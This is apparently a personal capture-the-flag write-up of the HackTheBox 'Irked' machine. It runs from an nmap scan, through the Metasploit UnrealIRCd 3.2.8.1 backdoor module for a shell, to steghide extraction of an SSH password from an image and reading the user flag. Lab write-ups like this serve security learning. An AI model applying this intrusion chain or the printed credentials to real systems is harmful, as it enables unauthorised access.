#####################
# Sources and Links #
#####################

#########
# TL,DR #
#########

########
# Hack #
########

Nmap scan report for 10.10.10.117
Host is up (0.095s latency).
Not shown: 58637 closed ports, 6892 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
8067/tcp  open  infi-async
44474/tcp open  unknown
65534/tcp open  unknown

msf5 > search unrealIRCd

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  No     UnrealIRCD 3.2.8.1 Backdoor Command Execution

Setting RHOSTS and RPORT gets us a shell!
RHOSTS:10.10.10.117
RPORT:6697

There is a user djmardov, but user.txt in Documents says Permission denied
There is a hidden .backup file

Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

This password corresponds to the irked.jpg at 10.10.10.117
ryann@kali:~/HackTheBox/Irked_117$ steghide extract -sf irked.jpg
Enter passphrase:
wrote extracted data to "pass.txt".
ryan@kali:~/HackTheBox/Irked_117$ cat pass.txt
Kab6h+m+bbp2J:HG

We can now ssh into the server as djmardov with the supplied password
We can cat /home/djmardov/Documents/user.txt

djmardov@irked:~/Documents$ wc user.txt
 1  1 33 user.txt

###########
# Learned #
###########
